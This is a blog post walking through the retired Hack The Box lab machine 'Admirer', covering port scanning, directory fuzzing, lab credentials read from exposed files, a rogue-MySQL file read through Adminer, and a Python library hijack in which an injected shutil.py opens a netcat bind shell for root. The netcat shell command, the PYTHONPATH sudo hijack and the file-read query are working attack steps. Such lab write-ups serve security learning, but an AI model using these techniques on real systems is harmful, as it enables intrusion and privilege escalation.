<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="author" content="map[name:S0S4]">
<meta name="description" content="ENUMERATION Nmap scan report for admirer.htb (10.10.10.187) Host is up (0.31s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.4p1 Debian 10&#43;deb9u7 (protocol 2.0) | ssh-hostkey: | 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA) | 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA) |_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 1 disallowed entry |_/admin-dir |_http-server-header: Apache/2." />
<meta name="keywords" content=", writeup, retired, hackthebox" />
<meta name="robots" content="noodp" />
<meta name="theme-color" content="#252627" />
<link rel="canonical" href="https://S0S4.gitlab.io/posts/htbadmirer/" />


    <title>
        
            {HTB}ADMIRER :: Sosa&#39;S Blog  — Hope you like your Instance!
        
    </title>



<link href="https://cdnjs.cloudflare.com/ajax/libs/flag-icon-css/3.5.0/css/flag-icon.min.css" rel="stylesheet"
    type="text/css">



<link rel="stylesheet" href="https://S0S4.gitlab.io/main.f522490e210589ddc6038ceec3f6da3332e6fc3a6333f481f7ee04980b41dac4.css">




    <link rel="apple-touch-icon" sizes="180x180" href="https://S0S4.gitlab.io/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://S0S4.gitlab.io/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="https://S0S4.gitlab.io/favicon-16x16.png">
    <link rel="manifest" href="https://S0S4.gitlab.io/site.webmanifest">
    <link rel="mask-icon" href="https://S0S4.gitlab.io/safari-pinned-tab.svg" color="#252627">
    <link rel="shortcut icon" href="https://S0S4.gitlab.io/favicon.ico">
    <meta name="msapplication-TileColor" content="#252627">
    <meta name="theme-color" content="#252627">



<meta itemprop="name" content="{HTB}ADMIRER">
<meta itemprop="description" content="ENUMERATION Nmap scan report for admirer.htb (10.10.10.187) Host is up (0.31s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.4p1 Debian 10&#43;deb9u7 (protocol 2.0) | ssh-hostkey: | 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA) | 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA) |_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 1 disallowed entry |_/admin-dir |_http-server-header: Apache/2.">
<meta itemprop="datePublished" content="2020-09-26T00:00:00+00:00" />
<meta itemprop="dateModified" content="2020-09-26T00:00:00+00:00" />
<meta itemprop="wordCount" content="1328">
<meta itemprop="image" content="https://S0S4.gitlab.io"/>



<meta itemprop="keywords" content="writeup,retired,hackthebox," />

<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:image" content="https://S0S4.gitlab.io"/>

<meta name="twitter:title" content="{HTB}ADMIRER"/>
<meta name="twitter:description" content="ENUMERATION Nmap scan report for admirer.htb (10.10.10.187) Host is up (0.31s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.4p1 Debian 10&#43;deb9u7 (protocol 2.0) | ssh-hostkey: | 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA) | 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA) |_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 1 disallowed entry |_/admin-dir |_http-server-header: Apache/2."/>



    <meta property="og:title" content="{HTB}ADMIRER" />
<meta property="og:description" content="ENUMERATION Nmap scan report for admirer.htb (10.10.10.187) Host is up (0.31s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.4p1 Debian 10&#43;deb9u7 (protocol 2.0) | ssh-hostkey: | 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA) | 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA) |_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 1 disallowed entry |_/admin-dir |_http-server-header: Apache/2." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://S0S4.gitlab.io/posts/htbadmirer/" />
<meta property="og:image" content="https://S0S4.gitlab.io"/>
<meta property="article:published_time" content="2020-09-26T00:00:00+00:00" />
<meta property="article:modified_time" content="2020-09-26T00:00:00+00:00" />





    <meta property="article:section" content="writeup" />



    <meta property="article:published_time" content="2020-09-26 00:00:00 &#43;0000 UTC" />








    </head>

    <body class="dark-theme">
        <div class="container">
            <header class="header">
    <span class="header__inner">
        <a href="https://S0S4.gitlab.io/" style="text-decoration: none;">
    <div class="logo">
        
            <span class="logo__mark">></span>
            <span class="logo__text">$ rm -rf /sosa</span>
            <span class="logo__cursor" style=
                  "
                   
                   ">
            </span>
        
    </div>
</a>


        <span class="header__right">
            
                <nav class="menu">
    <ul class="menu__inner"><li><a href="https://S0S4.gitlab.io/about/">About</a></li><li><a href="https://S0S4.gitlab.io/posts/">Posts</a></li>
    </ul>
</nav>

                <span class="menu-trigger">
                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
                        <path d="M0 0h24v24H0z" fill="none"/>
                        <path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z"/>
                    </svg>
                </span>
            

            <span class="theme-toggle unselectable"><svg class="theme-toggler" width="24" height="24" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">
  <path d="M22 41C32.4934 41 41 32.4934 41 22C41 11.5066 32.4934 3 22
  3C11.5066 3 3 11.5066 3 22C3 32.4934 11.5066 41 22 41ZM7 22C7
  13.7157 13.7157 7 22 7V37C13.7157 37 7 30.2843 7 22Z"/>
</svg>
</span>
        </span>
    </span>
</header>


            <div class="content">
                
  <main class="post">

    <div class="post-info">
      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-clock">
          <circle cx="12" cy="12" r="10"></circle>
          <polyline points="12 6 12 12 16 14"></polyline>
        </svg>
        7 minutes

        
      </p>
    </div>

    <article>
      <h1 class="post-title">
        <a href="https://S0S4.gitlab.io/posts/htbadmirer/">{HTB}ADMIRER</a>
      </h1>

      

      <div class="post-content">
        <h2 id="enumeration">ENUMERATION</h2>
<pre><code>Nmap scan report for admirer.htb (10.10.10.187)
Host is up (0.31s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
|   256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_  256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/admin-dir
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
</code></pre><h2 id="user">USER</h2>
<p>As you can see there is the ftp open, so let&rsquo;s try to enter with the Anonymous user, and it&rsquo;s not allowed to enter, so let&rsquo;s go to the web,
you see on the nmap that in the port 80 there is a robots.txt, so lets enter to the robots.txt, once we enter it puts:</p>
<pre><code>This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
Disallow: /admin-dir
</code></pre><p>So we enter on <code>/admin-dir</code>, but it give us a 403, but, let&rsquo;s use gobuster to see if there is something interesting:</p>
<pre><code>gobuster dir --url http://10.10.10.187/admin-dir/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,xml,html
</code></pre><pre><code>===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.187/admin-dir/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,xml,html
[+] Timeout:        10s
===============================================================
2020/09/23 07:36:17 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.xml (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.xml (Status: 403)
/.htaccess.html (Status: 403)
/contacts.txt (Status: 200)
/credentials.txt (Status: 200)
===============================================================
2020/09/23 07:43:50 Finished
===============================================================
</code></pre><p>As you can see there is two strange files: <code>contacts.txt</code> and <code>credentials.txt</code>
let&rsquo;s enter on <code>contacts.txt</code></p>
<pre><code>##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb


##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb



#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb
</code></pre><p>In <code>credentials.txt</code> we see:</p>
<pre><code>[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!
</code></pre><p>OH! We found the ftp user, let&rsquo;s enter to the FTP with this creds:</p>
<p><img src="https://S0S4.gitlab.io/static/images/admirer/fotoftp.png" alt="alt text" title="foto1"></p>
<p>There are 2 files, let&rsquo;s download them to our machine with get *
we cat on dump.sql and it doesn&rsquo;t have anything relevant,so let&rsquo;s untar the html.tar.gz with gzip -d and then</p>
<pre><code>tar -xf html.tar 
</code></pre><p>and once we gzip this, it give us:</p>
<pre><code>robots.txt,w4ld0s_s3cr3t_d1r,utility-scripts
</code></pre><p>As we enter on utility-scripts we can see like there is not nothing very
important, but let&rsquo;s put on the web the directory utility-scritpts, and there&rsquo;s another 403, let&rsquo;s fuzz again:</p>
<pre><code>gobuster dir --url http://10.10.10.187/utility-scripts/ -w /usr/share/wordlists/dirb/big.txt -x php,txt,xml,html
</code></pre><pre><code>===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.187/utility-scripts/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     html,php,txt,xml
[+] Timeout:        10s
===============================================================
2020/09/23 08:06:35 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.xml (Status: 403)
/.htpasswd.html (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.xml (Status: 403)
/.htaccess.html (Status: 403)
/adminer.php (Status: 200)
/info.php (Status: 200)
/phptest.php (Status: 200)
===============================================================
2020/09/23 08:14:07 Finished
===============================================================
</code></pre><p>Browsing to adminer.php lead us to Adminer 4.6.2 login. If we search for exploits to this version of Adminer we can see that we have to create and setup a mysql database and then allow remote access and access to our database on the adminer.php</p>
<h3 id="creating-and-configurating-mysql">CREATING AND CONFIGURATING MYSQL</h3>
<p>On my case I will be using mariadb and I will login on mysql as root and once I&rsquo;m root I will create a database called admirer:</p>
<pre><code>MariaDB [(none)]&gt; CREATE DATABASE admirer;
</code></pre><p>Creating the user demo:</p>
<pre><code>MariaDB [(none)]&gt; INSERT INTO mysql.user (User,Host,authentication_string,ssl_cipher,x509_issuer,x509_subject) -&gt; VALUES('demo','%',PASSWORD('demopassword'),'','','');
</code></pre><p>We save:</p>
<pre><code>MariaDB [(none)]&gt; FLUSH PRIVILEGES;
</code></pre><p>Giving the appropiate permissions:</p>
<pre><code>MariaDB [admirer]&gt; GRANT ALL PRIVILEGES ON *.* TO 'demo'@'%';
</code></pre><p>And creating the table test</p>
<pre><code>create table test(data VARCHAR(255));
</code></pre><p>Now we just have to allow remote access, in <code>/etc/mysql/mariadb.con.d/50-server.cnf</code> you search for <code>bind_address</code> and change 127.0.0.1 to 0.0.0.0</p>
<p>For now, we just restart mysql and go to:<code>http://10.10.10.187/utility-scripts/adminer.php</code> once we are here, in localhost we put our IP Address, on user we
put demo, we leave password in blank, and in database we put admirer. We press enter, and we are inside the database.
Inside here, we can see SQL COMMAND</p>
<p><img src="https://S0S4.gitlab.io/static/images/admirer/SQL.png" alt="alt text" title="foto2"></p>
<p>In here we are going to write some queries like:</p>
<pre><code>load data local infile 'app/data/index.php'
into table test
fields terminated by &quot;/n&quot; 
</code></pre><p>When it give us the OK, click on see the table contents and we can see the user and the password of the ssh.</p>
<p><img src="https://S0S4.gitlab.io/static/images/admirer/CREDS.png" alt="alt text" title="foto3"></p>
<p>As you can see the user and passwd are: <code>waldo:&amp;&lt;h5b~yK3F#{PaPB&amp;dA}{H&gt;</code></p>
<p>So, as I said now we can enter by ssh:</p>
<p><img src="https://S0S4.gitlab.io/static/images/admirer/ssh.png" alt="alt text" title="foto4"></p>
<h2 id="root">ROOT</h2>
<p>Okay, we have done the most difficult part of all the box.</p>
<p>Now the privilege escalation for root is easy peasy.</p>
<p><img src="https://S0S4.gitlab.io/static/images/admirer/sudo-l.png" alt="alt text" title="foto5"></p>
<p>We can see that waldo can execute /opt/scripts/admin_tasks.sh as root, if we <code>cat</code> this file we can see that is running a file called backup.py.</p>
<pre><code>#!/bin/bash

view_uptime()
{
    /usr/bin/uptime -p
}

view_users()
{
    /usr/bin/w
}

view_crontab()
{
    /usr/bin/crontab -l
}

backup_passwd()
{
    if [ &quot;$EUID&quot; -eq 0 ]
    then
        echo &quot;Backing up /etc/passwd to /var/backups/passwd.bak...&quot;
        /bin/cp /etc/passwd /var/backups/passwd.bak
        /bin/chown root:root /var/backups/passwd.bak
        /bin/chmod 600 /var/backups/passwd.bak
        echo &quot;Done.&quot;
    else
        echo &quot;Insufficient privileges to perform the selected operation.&quot;
    fi
}

backup_shadow()
{
    if [ &quot;$EUID&quot; -eq 0 ]
    then
        echo &quot;Backing up /etc/shadow to /var/backups/shadow.bak...&quot;
        /bin/cp /etc/shadow /var/backups/shadow.bak
        /bin/chown root:shadow /var/backups/shadow.bak
        /bin/chmod 600 /var/backups/shadow.bak
        echo &quot;Done.&quot;
    else
        echo &quot;Insufficient privileges to perform the selected operation.&quot;
    fi
}

backup_web()
{
    if [ &quot;$EUID&quot; -eq 0 ]
    then
        echo &quot;Running backup script in the background, it might take a while...&quot;
        /opt/scripts/backup.py &amp;
    else
        echo &quot;Insufficient privileges to perform the selected operation.&quot;
    fi
}

backup_db()
{
    if [ &quot;$EUID&quot; -eq 0 ]
    then
        echo &quot;Running mysqldump in the background, it may take a while...&quot;
        #/usr/bin/mysqldump -u root admirerdb &gt; /srv/ftp/dump.sql &amp;
        /usr/bin/mysqldump -u root admirerdb &gt; /var/backups/dump.sql &amp;
    else
        echo &quot;Insufficient privileges to perform the selected operation.&quot;
    fi
}



# Non-interactive way, to be used by the web interface
if [ $# -eq 1 ]
then
    option=$1
    case $option in
        1) view_uptime ;;
        2) view_users ;;
        3) view_crontab ;;
        4) backup_passwd ;;
        5) backup_shadow ;;
        6) backup_web ;;
        7) backup_db ;;

        *) echo &quot;Unknown option.&quot; &gt;&amp;2
    esac

    exit 0
fi


# Interactive way, to be called from the command line
options=(&quot;View system uptime&quot;
         &quot;View logged in users&quot;
         &quot;View crontab&quot;
         &quot;Backup passwd file&quot;
         &quot;Backup shadow file&quot;
         &quot;Backup web data&quot;
         &quot;Backup DB&quot;
         &quot;Quit&quot;)

echo
echo &quot;[[[ System Administration Menu ]]]&quot;
PS3=&quot;Choose an option: &quot;
COLUMNS=11
select opt in &quot;${options[@]}&quot;; do
    case $REPLY in
        1) view_uptime ; break ;;
        2) view_users ; break ;;
        3) view_crontab ; break ;;
        4) backup_passwd ; break ;;
        5) backup_shadow ; break ;;
        6) backup_web ; break ;;
        7) backup_db ; break ;;
        8) echo &quot;Bye!&quot; ; break ;;

        *) echo &quot;Unknown option.&quot; &gt;&amp;2
    esac
done

exit 0

</code></pre><p>backup.py is in the same directory as the admin_task.sh, if we cat on backup.py we can see that is running the <code>shutil</code> library, so we are gonna do a PythonLibrary Hijacking:</p>
<pre><code>#!/usr/bin/python3

from shutil import make_archive

src = '/var/www/html/'

# old ftp directory, not used anymore
#dst = '/srv/ftp/html'

dst = '/var/backups/html'

make_archive(dst, 'gztar', src)
</code></pre><p>PythonLibrary Hijacking is a technique consisting in creating a new file, with the same name as the library that the script is using, containing the code to execute a shell. Then, we change the path to include the directory in which we have that file before the directory of the original library, so when we execute the script it will take the file with our shell instead of the real library</p>
<p>(VICTIM=ADMIRER BOX 10.10.10.187)
(ATTACKER=YOUR BOX)</p>
<pre><code>(VICTIM)cd /home/waldo
(VICTIM)mkdir newpath
(VICTIM)cd newpath 
(VICTIM)echo &quot;&quot;import os os.system('nc -lvp 4444 -e /bin/bash')&quot; &gt; shutil.py&quot;  (you can make it with vim or nano if you want)
(VICTiM)pythonpath: sudo -E PYTHONPATH=$(pwd) /opt/scripts/admin_tasks.sh 6
(ATTACKER) nc 10.10.10.187 4444 
</code></pre><p>If we wait a few seconds in our terminal it would give us the shell as root:</p>
<p><img src="https://S0S4.gitlab.io/static/images/admirer/ROOT.png" alt="alt text" title="foto6"></p>

      </div>
    </article>

    <hr />

    <div class="post-info">
      
    <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-tag meta-icon"><path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7" y2="7"></line></svg>

        <span class="tag"><a href="https://S0S4.gitlab.io/tags/writeup/">writeup</a></span>
        <span class="tag"><a href="https://S0S4.gitlab.io/tags/retired/">retired</a></span>
        <span class="tag"><a href="https://S0S4.gitlab.io/tags/hackthebox/">hackthebox</a></span>
        
    </p>

      
    <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-folder meta-icon"><path d="M22 19a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2h5l2 3h9a2 2 0 0 1 2 2z"></path></svg>

        <span class="tag"><a href="https://S0S4.gitlab.io/categories/writeup/">writeup</a></span>
        
    </p>


      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-file-text">
          <path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path>
          <polyline points="14 2 14 8 20 8"></polyline>
          <line x1="16" y1="13" x2="8" y2="13"></line>
          <line x1="16" y1="17" x2="8" y2="17"></line>
          <polyline points="10 9 9 9 8 9"></polyline>
        </svg>
        1328 Words
      </p>

      <p>
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-calendar">
          <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect>
          <line x1="16" y1="2" x2="16" y2="6"></line>
          <line x1="8" y1="2" x2="8" y2="6"></line>
          <line x1="3" y1="10" x2="21" y2="10"></line>
        </svg>
        
          2020-09-26 02:00
        

         
          
        
      </p>
    </div>

    
      <div class="pagination">
        <div class="pagination__title">
          <span class="pagination__title-h"></span>
          <hr />
        </div>

        <div class="pagination__buttons">
          
            <span class="button previous">
              <a href="https://S0S4.gitlab.io/posts/htbcache/">
                <span class="button__icon">←</span>
                <span class="button__text">{HTB}CACHE</span>
              </a>
            </span>
          

          
            <span class="button next">
              <a href="https://S0S4.gitlab.io/posts/htbbashed/">
                <span class="button__text">{HTB}BASHED</span>
                <span class="button__icon">→</span>
              </a>
            </span>
          
        </div>
      </div>
    


    

  </main>

            </div>

            
                <footer class="footer">
    <div class="footer__inner">
        <div class="footer__content">
            <span>&copy; 2020</span>
            
                <span><a href="https://S0S4.gitlab.io">Sosa</a></span>
            
            
                <span><a href="https://creativecommons.org/licenses/by-nc/4.0/" target="_blank" rel="noopener">CC BY-NC 4.0</a></span>
            
            <span> <a href="https://S0S4.gitlab.io/posts/index.xml" target="_blank" title="rss"><svg xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 20 20" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-rss"><path d="M4 11a9 1 1 1 1 1 1"></path><path d="M4 4a16 16 0 0 1 16 16"></path><circle cx="5" cy="19" r="1"></circle></svg></a></span>
        </div>
    </div>
    <div class="footer__inner">
        <div class="footer__content">
          </div>
    </div>
</footer>

            
        </div>

        




<script type="text/javascript" src="https://S0S4.gitlab.io/bundle.min.dc716e9092c9820b77f96da294d0120aeeb189b5bcea9752309ebea27fd53bbe6b13cffb2aca8ecf32525647ceb7001f76091de4199ac5a3caa432c070247f5b.js" crossorigin="anonymous"></script>



    </body>
</html>
